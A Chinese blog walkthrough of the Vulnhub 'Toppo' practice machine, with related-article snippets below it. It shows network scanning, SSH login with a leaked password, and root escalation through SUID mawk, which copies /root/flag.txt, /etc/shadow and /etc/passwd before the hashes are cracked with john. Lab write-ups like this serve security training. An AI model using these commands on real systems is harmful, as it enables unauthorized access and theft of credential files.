Vulnhub靶机练习——Toppo

最新推荐文章于 2024-05-07 16:35:55 发布
最新推荐文章于 2024-05-07 16:35:55 发布
阅读量964 收藏 5
点赞数 1
分类专栏: 靶机练习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45126664/article/details/107826600
版权

这是一次靶场练习,使用 kali 和 Vulnhub 的Toppo靶机 ,难度属于新手入门 !

靶机下载地址:

1、https://download.vulnhub.com/toppo/Toppo.zip
2、https://download.vulnhub.com/toppo/Toppo.zip.torrent

知识点:

1、netdiscover发现局域网内靶机IP地址
2、nmap扫描端口、服务、漏洞
3、dirb路径扫描
4、根据发现的端口(服务),尝试相应的探测和攻击
5、cewl搜集页面关键词做成密码字典
6、john密码爆破
7、Linux提权

0x01 信息收集

sudo netdiscover -r 192.168.5.101/24   
#发现接入网络内的靶机,用 nmap -A 192.168.5.101/24 也可以获取靶机的地址

在这里插入图片描述

sudo arp-scan -l
# arp-scan 也可以用于发现内网IP
# 192.168.5.103 是靶机IP

在这里插入图片描述

sudo nmap -sV -Pn -A -O 192.168.5.103    
#收集端口信息,看看目标开放了那些业务,目标开放了 22、80、111 端口

在这里插入图片描述

0x02 弱点探测

先从先前发现的 22、80、111 三个端口入手

22端口:ssh 192.168.5103    
#尝试直接连接ssh,一般是不行的,这里果然不行

在这里插入图片描述

80端口:直接浏览器访问 http://192.168.5.103

在这里插入图片描述
22 端口和 80 端口暂时没有获得什么有效的信息!

dirb http://192.168.5.103    
# 尝试扫描web目录,发现了很多路径
# 我在 http://192.168.5.103/admin/ 这个路径下发现了惊喜

在这里插入图片描述
在这里插入图片描述
靶机的账号密码可能是:12345ted123

0x03 渗透攻击

1、尝试ssh,因为我没有发现web登录页面,用 12345ted123 里面的字符组合得到账号:ted 密码:12345ted123
2、账号可能是web页面里面的一些关键字,可以将这些单词做成一个字典,对账号进行爆破使用cewl爬取网页里面的关键词做成密码字典进行爆破

在这里插入图片描述

0x04 权限提升

find / -perm -u=s -type f 2>/dev/null        
#进入内部后,最好被动的收集信息,尽量不要使用工具以达到提权

在这里插入图片描述
发现 python2.7 和 mawk 有执行权限!

/usr/bin/mawk 'BEGIN{system("whoami")}'
/usr/bin/mawk 'BEGIN{system("ls /root")}'    //直接发现flag
/usr/bin/mawk 'BEGIN{system("cp /root/flag.txt ./")}'

在这里插入图片描述

/usr/bin/mawk 'BEGIN{system("cp /etc/shadow ./")}'
/usr/bin/mawk 'BEGIN{system("cp /etc/passwd ./")}'        
scp ted@192.168.5.103:/home/ted/passwd ./     
scp ted@192.168.5.103:/home/ted/shadow ./           #将 passwd 和 shadow 文件拷贝到kali上进行破解

在这里插入图片描述

sudo john shadow        
#用john爆破一下shadow

在这里插入图片描述
在这里插入图片描述
提权成功!

0x05 权限维持!

kdist
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
基于Toppo渗透测试的学习笔记
gaily123的博客
10-09 377
基于Toppo渗透测试的学习笔记 靶机与kali均为NAT模式 kali ip为192.168.79.130 扫描 上nmap扫网段 发现靶机ip为192.168.79.147 扫端口发现22,80,111,42143 进80端口查看,是一个博客 没有什么完善的功能,于是扫后台目录 扫到admin进入发现有一个txt,为以下内容 Note to myself : I need to cha...
靶机渗透】入门级Toppo靶机渗透练习
serendipity1130的博客
08-30 437
1.主机发现:arp-scan -l,发现靶机ip为192.168.225.148,并进行访问 2.扫描端口,开启了80,22端口 nmap 192.168.225.148 -sV -sC -Pn -n -v -T5 -p- 3.扫目录发现admin的页面,进行访问: dirb http://192.168.225.148 3.发现note.txt,根据提示:他不懂技术,不会改密码,所以猜测靶机密码为:12345ted123 4.尝试远程登录一下: ssh 19
[Vulnhub靶机] DC-1
最新发布
haosha。的博客
05-07 4065
[Vulnhub靶机]DC-1靶机渗透思路及方法(个人分享)
vulnhub之DC9靶机
LainWith的博客
02-15 3406
目录介绍信息收集主机发现主机信息探测访问网站爆破网站-失败漏扫网站sqlmap注入任意文件读取漏洞SSH爆破信息收集二次SSH爆破提权方式1提权方式2参考 介绍 系列: DC(此系列共10台) 发布日期:2019年12月29日 难度:中级 Flag:获取root权限并读取唯一的Flag 学习: bp联动xray扫描 sql注入 任意文件读取 ssh开门 提权 靶机地址:https://www.vulnhub.com/entry/dc-9,412/ 从靶场得到提示信息: 靶机更适用Virtualbox
Vulnhub:Toppo 1靶机
qq_43884092的博客
05-02 92
网站中的文件提示密码,cewl收集目标网站信息爆破ssh,拥有suid权限的python提权
看完这篇 教你玩转渗透测试靶机Vulnhub——Hacksudo: Aliens
Aluxian_的博客
10-26 781
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VMware或者Oracle VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。
vulnhub靶机DC1
weixin_52450702的博客
10-29 930
靶机DC1IP:192.168.70.160。
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
VulnHub 靶机系列实战教程.pdf
07-22
VulnHub 靶机系列实战教程.pdf
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)
01-09
这次的靶机Vulnhub靶机:Kioptrix: Level 1.2 (#3) 文章目录靶机地址及相关描述靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址及相关描述 https://www.vulnhub.com/entry/kioptrix-level-12-3,24/ 靶机设置 老规矩,开启虚拟机前分配一个和攻击机一样的网卡,选择我已移动该虚拟机;开启虚拟机后,netdiscover确认一下目标,我的靶机ip为192.168.190.189 靶机描述里还要配置host指向kioptrix3.com vim /etc/hosts 利用知识及工具 信息收集并getsh
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
靶机vulnhub靶机cybox1
weixin_52450702的博客
02-28 478
vulnhub靶机cybox
VulnHub narak
weixin_45682839的博客
10-21 1120
涉及知识包括:主机存活探测、端口服务探测、WEB信息搜集、WEB爆破专用字典生成、暴力破解、webdav PUT上传、linux本地提权、Brainfuck加解密、motd文件注入提权等。
vulnhub靶机实战--FunBox3:EASY
m0_64312309的博客
09-21 598
Vulnhub介绍: Vulnhub 是一个漏洞靶场平台,里面含有大量的靶场镜像,只需要下载虚拟机镜像,导入 VMWare 或者 VirtualBox 即可启动靶场,同时它还提供了 Docker 镜像,可以使用 Docker 直接启动靶场,大大简化了渗透测试人员在搭建各种漏洞靶场时的步骤
vulnhubToppo实战攻略
weixin_43862283的博客
04-14 617
vulnhubToppo实战攻略 0x01 前言 作为信息安全中新入围的小白,实战还是很重要的,就从最基础的开始咯!找了Vulnhub中菜鸟中的菜鸟做的,跟大家分享一下。 0x02 环境及配置 Toppo:1 难度 : Beginner 网卡配置:桥接模式 DHCP 下载地址:: https://download.vulnhub.com/toppo/Toppo.zip 0x03 攻击 第一步,...
看完这篇 教你玩转渗透测试靶机vulnhub——hackableII
Aluxian_的博客
10-07 1281
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。老样子需要找到flag即可。这个靶机很简单就一个提权是新知识点 别的信息收集,FTP匿名,回弹shell md5解码都是之前做过的!
vulnhub靶机——raven: 2
09-03
Raven: 2是一台中级难度的boot2root虚拟机,目标是获取四个标志(flag)。Raven Security在多次遭受入侵后,采取了额外措施来加固他们的web服务器,以防止黑客入侵。你可以在Vulnhub上找到Raven: 2的ova文件,并使用VirtualBox打开。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [vulnhub靶机raven2](https://blog.csdn.net/weixin_52450702/article/details/127811079)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [vulnhub靶机——RAVEN: 2](https://blog.csdn.net/qq_44029310/article/details/126491848)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)](https://download.csdn.net/download/weixin_38717843/14052717)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值